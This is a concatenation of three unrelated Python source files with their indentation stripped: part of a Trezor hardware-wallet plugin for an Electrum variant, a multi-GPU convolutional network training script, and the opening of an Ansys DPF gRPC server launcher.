"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_ganja_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_ganja_tx_to_txtype(tx)
|
train_multi.py
|
import os
import sys
import time
import numpy
import argparse
import math
import random
import socket
import pickle
import time
import multiprocessing as mp
import threading
import denet.common as common
import denet.common.logging as logging
import denet.dataset as dataset
import denet.multi.shared as shared
from denet.multi.worker import WorkerProcess
from denet.multi.update_server import UpdateServer
from denet.multi.update_client import UpdateClient
from denet.dataset import DatasetExportThread
#updates model with training data
def run_train_epoch(args, update_client, workers, model, train_data, learn_rate):
import model_cnn
logging.info("Perform train...")
batch_size_factor = args.batch_size_factor
output_prefix = args.output_prefix
model_dims = args.model_dims
model_save_dt = args.model_save_dt*60
#update learning rates:
for worker in workers:
with worker.learn_rate.get_lock():
worker.learn_rate.value = learn_rate
#randomly shuffle data before each epoch, set seed to ensure each node has same data order
random.seed(args.seed + update_client.epoch)
train_data.shuffle()
#perform initial sync so that all nodes have the same model
model_update = shared.ModelUpdate(model_dims)
model_update.import_updates(model)
# update_client.sync(model_update, workers, initial=True)
#get subset next
subset_next = update_client.get_subset_next()
#start export of data
batch_size = len(workers) * model.batch_size * batch_size_factor
logging.info("SGD batch size is %ix%ix%i = %i"%(batch_size_factor, len(workers), model.batch_size, batch_size))
export_thread = DatasetExportThread(model, train_data, subset_next, batch_size, True)
#start processing
total_cost=0
total_it=0
subset_current = subset_next
epoch_current = update_client.epoch
for worker in workers:
worker.set_epoch(epoch_current)
timer = common.Timer()
timer_save = common.Timer()
while subset_next >= 0:
#wait until export is ready
timer.reset()
export_thread.wait()
data_x, data_y, data_size = export_thread.get_export()
subset_current = subset_next
del export_thread
if timer.current() > 1:
logging.warning("Warning: needed an additional %.1f seconds for dataset export"%timer.current())
#print training classes for checking random seed etc
logging.debug("Sample Metas: ", data_y[0:min(3, len(data_y))])
#start exporting next subset
subset_next = update_client.get_subset_next()
if subset_next >= 0:
export_thread = DatasetExportThread(model, train_data, subset_next, batch_size, True)
# #store initial model before changes
# model_update_delta = model_update.copy()
logging.info("Evaluating training function")
timer.reset()
batch_num = data_x.shape[0] // model.batch_size
it_num = batch_num // (len(workers)*batch_size_factor)
index=0
subset_cost = 0
while(index < batch_num):
total_ts = time.time()
def train_worker_thread(worker, indexs):
worker.wait()
worker.model_write(model_update)
worker.train_begin()
for i in indexs:
dx = data_x[i*model.batch_size : (i + 1)*model.batch_size]
dy = data_y[i*model.batch_size : (i + 1)*model.batch_size]
worker.train_step(dx, dy)
worker.wait()
worker.train_end()
worker.model_read()
worker.wait()
threads=[]
for worker in workers:
worker_indexs=[]
for _ in range(batch_size_factor):
if index < batch_num:
worker_indexs.append(index)
index += 1
t = threading.Thread(target=train_worker_thread, args=(worker, worker_indexs))
t.start()
threads.append((t, time.time()))
proc_ts = []
for t, start_ts in threads:
t.join()
proc_ts.append(int(1000*(time.time() - start_ts)))
#average models between GPUS and print batch info
combine_ts = time.time()
batch_cost = 0
model_update.set_mean_init()
for worker in workers:
model_update.set_mean_update(worker.model_update)
with worker.cost.get_lock():
batch_cost += worker.cost.value
model_update.set_mean_finish()
batch_cost /= len(workers)
subset_cost += batch_cost
it_index = index // (len(workers)*batch_size_factor)
combine_ts = int(1000*(time.time() - combine_ts))
logging.verbose("Processing times (ms):", proc_ts, ", Combine time: %i ms"%combine_ts)
logging.info("Subset %i/%i, Batch It %i/%i"%(subset_current+1, train_data.subset_num, it_index, it_num), "- Cost:", batch_cost, "Time: %i ms"%(1000*(time.time() - total_ts)))
logging.info("Training subset %i took %0.1f sec, mean cost:"%(subset_current+1, timer.current()), subset_cost / it_num)
total_it += it_num
total_cost += subset_cost
#update with server (if one exists)
model_update.export_updates(model)
# model_update_delta.set_delta(model_update)
# update_client.update(model_update_delta, model_update, workers)
#save intermediate models
if timer_save.current() > model_save_dt and model_save_dt > 0:
model_cnn.save_to_file(model, output_prefix + "_epoch%03i_subset%03i.mdl.gz"%(epoch_current, subset_current+1))
timer_save.reset()
#perform final sync so that all nodes have the same model
update_client.sync(model_update, workers)
#save final models
model_cnn.save_to_file(model, output_prefix + "_epoch%03i_final.mdl.gz"%(epoch_current))
return (total_cost / total_it)
#compute per class error rates
def compute_error(workers, model, test_data):
logging.info("Perform inference...")
class_errors=[0]*model.class_num
class_samples=[0]*model.class_num
#export first data
export_thread = DatasetExportThread(model, test_data, 0, len(workers)*model.batch_size, False)
for subset in range(test_data.subset_num):
export_thread.wait()
data_x, data_y, data_size = export_thread.get_export()
truth_labels = export_thread.get_labels()
del export_thread
#start exporting next subset
if (subset+1) < test_data.subset_num:
logging.info("Starting next subset export")
export_thread = DatasetExportThread(model, test_data, subset + 1, len(workers)*model.batch_size, False)
logging.info("Evaluating predict function (%i samples)"%data_size)
predict_y = numpy.zeros(shape=(data_x.shape[0], model.get_probability_shape()[1]), dtype=numpy.float32)
nbatch = data_x.shape[0] // model.batch_size
index=0
while(index < nbatch):
#use group of workers to process multi gpu batch
active_workers=[]
for worker in workers:
if index < nbatch:
                    dx = data_x[index * model.batch_size : (index + 1) * model.batch_size]
worker.predict(dx)
active_workers.append(worker)
index += 1
#as workers finish combine resulting models
done=[False]*len(active_workers)
while(False in done):
for i, worker in enumerate(active_workers):
if done[i] == False and worker.get_active() == 0:
done[i] = True
worker_index = index - len(active_workers) + i
logging.verbose("Adding predictions %i/%i"%(worker_index, nbatch))
with worker.data_y.lock:
predict_y[worker_index * model.batch_size : (worker_index + 1) * model.batch_size, ...] = worker.data_y.get_array()[...]
time.sleep(0.0001)
predict_y = predict_y[0:data_size, ...]
predict_labels = numpy.argmax(predict_y, axis=1)
#print("sizes:", truth_labels.shape, data_size)
for i in range(data_size):
class_samples[truth_labels[i]] += 1
if predict_labels[i] != truth_labels[i]:
class_errors[truth_labels[i]] += 1
#compute errors
error=100.0*sum(class_errors) / sum(class_samples)
cls_errors=[]
for i in range(model.class_num):
x = 100.0*class_errors[i] / class_samples[i] if class_samples[i] > 0 else 100.0
cls_errors.append((i, x, class_samples[i]))
return (error, cls_errors)
def save_results(fname, error, class_errors):
with open(fname, "w") as f:
logging.info("Overall Error=%.2f%%"%(error), file=f)
for d in class_errors:
logging.info("Class %i=%.2f%% (%i samples)"%(d[0],d[1],d[2]*d[1]/100), file=f)
def load_restart_args(args_fname, args):
if not os.path.isfile(args_fname):
raise Exception("Cannot find arguments file:" + args_fname)
logging.info("Loading arguments from:", args_fname)
with open(args_fname, "rb") as f:
args = pickle.load(f)
#search for models
model_fnames = common.find_files(os.path.dirname(args.output_prefix), "*_epoch*.mdl.gz")
if len(model_fnames) == 0:
raise Exception("Could not find any intermediate models to continue training from!")
v = os.path.basename(model_fnames[-1])
v = v[:v.find(".")].split("_")
if v[-1] == "final":
args.epoch_start = int(v[-2][5:]) + 1
args.subset_start = 0
else:
args.epoch_start = int(v[-2][5:])
args.subset_start = int(v[-1][6:]) + 1
args.model = model_fnames[-1]
logging.info("Continuing training with model:", args.model, "epoch:", args.epoch_start, "subset:", args.subset_start)
return args
def main():
#load arguments:
parser = argparse.ArgumentParser(description='Train a convolutional network using labelled data')
logging.add_arguments(parser)
parser.add_argument("--use-acc-mode", default=False, action="store_true", help="Use model accumulation over multiple batches (uses more VRAM)")
parser.add_argument("--cost-factors", default=[], nargs="+", help="Multiplicative factors for model costs")
parser.add_argument("--export-model-dims", default=False, action="store_true", help="Ignore, don't use this option!")
parser.add_argument("--model-dims", default="./model-dims.json", type=str, help="export file for shared model dimensions")
parser.add_argument("--model-save-dt", default=30, type=int, help="Minimum time (min) between saving an intermediate model. Use 0 to disable.")
parser.add_argument("--model", required=False, default=None, help="Model to continue training.")
parser.add_argument("--gpus", nargs="+", default=["gpu0"], help="list of gpus to train over")
parser.add_argument("--update-server", metavar="<addr> [port] [offset] [delta]", nargs="+", default=None,
help="model update server for synchronizing multiple networked machines. Set <addr> to 'mpi' for MPI networking.")
parser.add_argument("--subset-max", type=int, default=10000000, help="Specify maximum number of subsets to be used in each training epoch")
parser.add_argument("--train", default=None, help="The folder with training / validation data")
parser.add_argument("--test", default=None, help="The folder with testing data (optional)")
parser.add_argument("--test-mode", default="default", help="Testing Mode")
parser.add_argument("--test-epochs", type=int, default=1, help="Epochs between each test evaluation")
parser.add_argument("--thread-num", type=int, default=1, help="Number of threads to use for supported opeartions (e.g. loading/distorting datasets)")
parser.add_argument("--extension", default="ppm", help="Image file extension")
parser.add_argument("--activation", default="relu", help="Activation function used in convolution / hidden layers (tanh, relu, leaky-relu)")
parser.add_argument("--border-mode", default="half", help="Border mode for convolutional layers (full, valid)")
parser.add_argument("--output-prefix", default="./model", help="Output prefix for model files")
parser.add_argument("--solver", type=str, default="nesterov", help="")
parser.add_argument("--weight-init", nargs="+", default=["he-backward"], help="Weight initialization scheme")
parser.add_argument("--initial-tune", type=float, default=0.0, help="Perform initial tuning with learning rate")
parser.add_argument("--learn-rate", type=float, default=0.1, help="Learning rate for weights and biases.")
parser.add_argument("--learn-momentum", type=float, default=[0.0,0.0], nargs="+", help="Learning momentum for weights and biases (0.0 - 1.0).")
parser.add_argument("--learn-anneal", type=float, default=1, help="Annealing factor per epoch for weight and bias learning rate")
parser.add_argument("--learn-anneal-epochs", nargs="+", type=int, default=[], help="Epochs to apply learning rate annealing (default every epoch)")
parser.add_argument("--learn-decay", type=float, default=0.0, help="L2 weight decay (not applied to biases). ")
parser.add_argument("--epochs", type=int, default=30, help="The number of training epochs")
parser.add_argument("--epoch-start", type=int, default=0, help="Epoch to start from")
parser.add_argument("--subset-start", type=int, default=0, help="Subset to start from")
parser.add_argument("--max-samples", type=int, default=None, help="Maximum samples to load from training set")
parser.add_argument("--batch-size", type=int, default=32, help="Size of each processing batch (per GPU)")
parser.add_argument("--batch-size-factor", type=int, default=1, help="Batch size multiplier, use when desired batch size won't fit in memory.")
parser.add_argument("--batch-data-size", type=int, default=1, help="Number of batches to upload to GPU for processing")
parser.add_argument("--seed", type=int, default=23455, help="Random Seed for weights")
parser.add_argument("--split-seed", type=int, default=0, help="Random Seed for splitting into validation / training")
parser.add_argument("--export-symbolic", default=None, help="Save datasets as symbolic links")
parser.add_argument("--distort-mode", default=[], nargs="+", help="Distortions to apply to training data (default, cifar10, disable)")
parser.add_argument("--augment-mirror", default=False, action="store_true", help="Augment training data with horizontally mirrored copies")
parser.add_argument("--skip-train", default=False, action="store_true", help="Skip training of model")
parser.add_argument("--skip-layer-updates", type=int, nargs="+", default=[], help="Skip training updates to specified layers")
parser.add_argument("--model-desc", default=["C100,7", "P2", "C150,4", "P2", "C250,4", "P2", "C300,1", "CR"], nargs="+", type=str, help="Network layer description" )
parser.add_argument("--theano-flags", type=str, default="lib.cnmem=1.0", help="Additional THEANO_FLAGS environment variables for worker threads")
parser.add_argument("--restart", default=False, action="store_true", help="Restart training of model")
args = parser.parse_args()
logging.init(args)
#continue training
args_fname = "./train.args"
if args.restart:
args = load_restart_args(args_fname, args)
else:
logging.info("Exporting arguments:", args_fname)
with open(args_fname, "wb") as f:
pickle.dump(args, f)
#start MPI update server if this is master node:
if not args.update_server is None and args.update_server[0] == "mpi":
from mpi4py import MPI
if MPI.COMM_WORLD.Get_rank() == 0:
momentum = float(args.update_server[1])
update_server = UpdateServer(args.model_dims, momentum=momentum, use_mpi=True, use_async=True)
sys.exit(update_server.start())
#set random seeds
random.seed(args.seed)
numpy.random.seed(args.seed)
#load training dataset
logging.info("Loading training data: " + str(args.train))
train_data = dataset.load(args.train, args.extension, is_training=True, thread_num=args.thread_num)
data_shape = train_data.get_data_shape()
class_num = train_data.get_class_num()
class_labels = train_data.class_labels
logging.info("Found %i samples across %i class Labels:\n"%(train_data.get_total_size(), class_num), class_labels)
#HACK to determine model parameter dimensions for shared models without initializing theano...
    #Not needed any more in theano-0.8.0
if not os.path.isfile(args.model_dims):
logging.info("Exporting model dims file to " + args.model_dims)
import model_cnn
model = model_cnn.initialize(args, data_shape, class_labels, class_num)
model.build_train_func(args.solver, skip_build=True)
shared.ModelUpdate.save_dims(args.model_dims, model)
logging.info("Done")
exit(0)
#construct worker processes (must be done before model due to Theano init! No longer true in theano 0.8.0):
logging.info("Initializing worker procs for", args.gpus)
workers = [WorkerProcess(gpu, args, data_shape, class_labels) for gpu in args.gpus]
#initialize model (and Theano)
import model_cnn
model = model_cnn.initialize(args, data_shape, class_labels, class_num)
model.build_train_func(args.solver, skip_build=True)
#mirror training data
if args.augment_mirror:
        train_data.augment_mirror()
#load test dataset
if args.test:
logging.info("Loading test: " + str(args.test))
test_data = dataset.load(args.test, args.extension, is_training=False, class_labels=class_labels, thread_num=args.thread_num)
logging.info("Testing: " + str(test_data.get_total_size()) + " samples")
assert(test_data.get_total_size() != 0)
#connect with update server
if not args.update_server is None:
addr = args.update_server[0]
use_mpi = bool(addr == "mpi")
use_async = bool(len(args.update_server) == 2)
port = 0 if use_mpi else int(args.update_server[1])
offset = 0 if use_async else int(args.update_server[2])
delta = 0 if use_async else int(args.update_server[3])
logging.info("Connecting to update server (async=%i, mpi=%i): "%(use_async, use_mpi), addr, port)
sock = 0 if use_mpi else socket.create_connection((addr, port))
update_client = UpdateClient(args.epoch_start, args.subset_start, train_data.subset_num, sock, use_async, use_mpi, offset, delta)
else:
update_client = UpdateClient(args.epoch_start, args.subset_start, train_data.subset_num)
#perform training and save models
if args.initial_tune > 0:
logging.info("----- Initial Fine Tune -----")
logging.info("Running initial tune with learning rate:", args.initial_tune)
run_train_epoch(args, update_client, workers, model, train_data, args.initial_tune)
#anneal learning rate
learn_rate = args.learn_rate
for epoch in range(0, args.epoch_start):
if len(args.learn_anneal_epochs) == 0 or (epoch+1) in args.learn_anneal_epochs:
logging.verbose("Annealing learning rate")
learn_rate *= args.learn_anneal
#Run training
    best_test_error = 100.0
for epoch in range(args.epoch_start, args.epochs):
logging.info("----- Training Epoch: " + str(epoch) + " -----")
#perform training and save models
if not args.skip_train:
logging.info("Training with learning rates " + str(learn_rate) + " and momentum " + str(args.learn_momentum))
timer = common.Timer()
cost = run_train_epoch(args, update_client, workers, model, train_data, learn_rate)
logging.info("Training - mean cost:", cost, ", took %.0f sec"%timer.current())
#anneal learning rate
if len(args.learn_anneal_epochs) == 0 or (epoch+1) in args.learn_anneal_epochs:
logging.verbose("Annealing learning rate")
learn_rate *= args.learn_anneal
#perform testing
test_error=0
if args.test and ((epoch%args.test_epochs) == 0 or epoch == (args.epochs-1)):
ts = time.time()
test_error, test_class_errors = compute_error(workers, model, test_data)
logging.info("Epoch %i Test Error: %.2f%%, Took %.0f sec"%(epoch, test_error, time.time()-ts))
save_results(args.output_prefix + "_epoch%03i.test"%epoch, test_error, test_class_errors)
logging.info("Finished Training")
if __name__ == '__main__':
    #make additional processes spawn a new python interpreter
import multiprocessing as mp
mp.set_start_method('spawn')
sys.setrecursionlimit(10000)
sys.exit(main())
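# Illustrative launch command (assumed paths and values, for reference only):
#   python train_multi.py --train ./data/train --test ./data/test \
#       --gpus gpu0 gpu1 --batch-size 32 --epochs 30 --output-prefix ./models/run1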
|
server.py
|
"""
Server
======
Contains the directives necessary to start the DPF server.
"""
from threading import Thread
import io
import platform
import logging
import time
import os
import socket
import subprocess
import grpc
import psutil
import weakref
import atexit
import copy
from ansys import dpf
from ansys.dpf.core.misc import find_ansys, is_ubuntu
from ansys.dpf.core import errors
from ansys.dpf.core._version import __ansys_version__
MAX_PORT = 65535
LOG = logging.getLogger(__name__)
LOG.setLevel("DEBUG")
# default DPF server port
DPF_DEFAULT_PORT = int(os.environ.get("DPF_PORT", 50054))
LOCALHOST = os.environ.get("DPF_IP", "127.0.0.1")
def shutdown_global_server():
try:
        if dpf.core.SERVER is not None:
del dpf.core.SERVER
except:
pass
atexit.register(shutdown_global_server)
def has_local_server():
"""Check if a local DPF gRPC server has been created.
Returns
-------
bool
``True`` when a local DPF gRPC server has been created.
"""
return dpf.core.SERVER is not None
def _global_server():
"""Retrieve the global server if it exists.
If the global server has not been specified, check if the user
has specified the "DPF_START_SERVER" environment variable. If
``True``, start the server locally. If ``False``, connect to the
existing server.
"""
if dpf.core.SERVER is None:
if os.environ.get("DPF_START_SERVER", "").lower() == "false":
ip = os.environ.get("DPF_IP", LOCALHOST)
port = int(os.environ.get("DPF_PORT", DPF_DEFAULT_PORT))
connect_to_server(ip, port)
else:
start_local_server()
return dpf.core.SERVER
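    # Usage note (illustrative): with DPF_START_SERVER=false and DPF_IP/DPF_PORT set
    # in the environment, this falls back to connect_to_server() against an
    # already-running gRPC server instead of starting a new local one.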
def port_in_use(port, host=LOCALHOST):
"""Check if a port is in use at the given host.
The port must actually "bind" the address. Just checking to see if a
socket can be created is insufficient because it's possible to run into
permission errors like: ``An attempt was made to access a socket in a way
forbidden by its access permissions.``
Returns
-------
bool
``True`` when the port is in use, ``False`` when free.
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
try:
sock.bind((host, port))
return False
except:
return True
def check_valid_ip(ip):
"""Check if a valid IP address is entered.
This method raises an error when an invalid IP address is entered.
"""
try:
socket.inet_aton(ip)
except OSError:
raise ValueError(f'Invalid IP address "{ip}"')
def shutdown_all_session_servers():
"""Shut down all active servers created by this module."""
from ansys.dpf.core import _server_instances
copy_instances = copy.deepcopy(_server_instances)
for instance in copy_instances:
try:
instance().shutdown()
except Exception as e:
print(e.args)
pass
def start_local_server(
ip=LOCALHOST,
port=DPF_DEFAULT_PORT,
ansys_path=None,
as_global=True,
load_operators=True,
):
"""Start a new local DPF server at a given port and IP address.
    This method requires Windows and ANSYS 2021 R1 or later. If ``as_global=True`` (which is
    the default), the server is stored globally, replacing the one stored previously.
    Otherwise, a user must keep a handle on their server.
Parameters
----------
ip : str, optional
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
ansys_path : str, optional
Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
The default is the latest Ansys installation.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
load_operators : bool, optional
Whether to automatically load the math operators. The default is ``True``.
Returns
-------
server : server.DpfServer
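    Examples
    --------
    Start a local server without making it the global default (illustrative,
    following the commented doctest style used elsewhere in this module).
    >>> #from ansys.dpf import core as dpf
    >>> #server = dpf.start_local_server(as_global=False)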
"""
if ansys_path is None:
ansys_path = os.environ.get("AWP_ROOT" + __ansys_version__, find_ansys())
if ansys_path is None:
raise ValueError(
"Unable to automatically locate the Ansys path. "
"Manually enter one when starting the server or set it "
'as the environment variable "ANSYS_PATH"'
)
# verify path exists
if not os.path.isdir(ansys_path):
raise NotADirectoryError(f'Invalid Ansys path "{ansys_path}"')
# parse the version to an int and check for supported
try:
ver = int(ansys_path[-3:])
if ver < 211:
raise errors.InvalidANSYSVersionError(f"Ansys v{ver} does not support DPF")
if ver == 211 and is_ubuntu():
raise OSError("DPF on v211 does not support Ubuntu")
except ValueError:
pass
# avoid using any ports in use from existing servers
used_ports = []
if dpf.core._server_instances:
for srv in dpf.core._server_instances:
if srv():
used_ports.append(srv().port)
while port in used_ports:
port += 1
# verify port is free
while port_in_use(port):
port += 1
server = None
n_attempts = 10
for _ in range(n_attempts):
try:
server = DpfServer(
ansys_path, ip, port, as_global=as_global, load_operators=load_operators
)
break
except errors.InvalidPortError: # allow socket in use errors
port += 1
if server is None:
raise OSError(
f"Unable to launch the server after {n_attempts} attempts. "
"Check the following path:\n{ansys_path}\n\n"
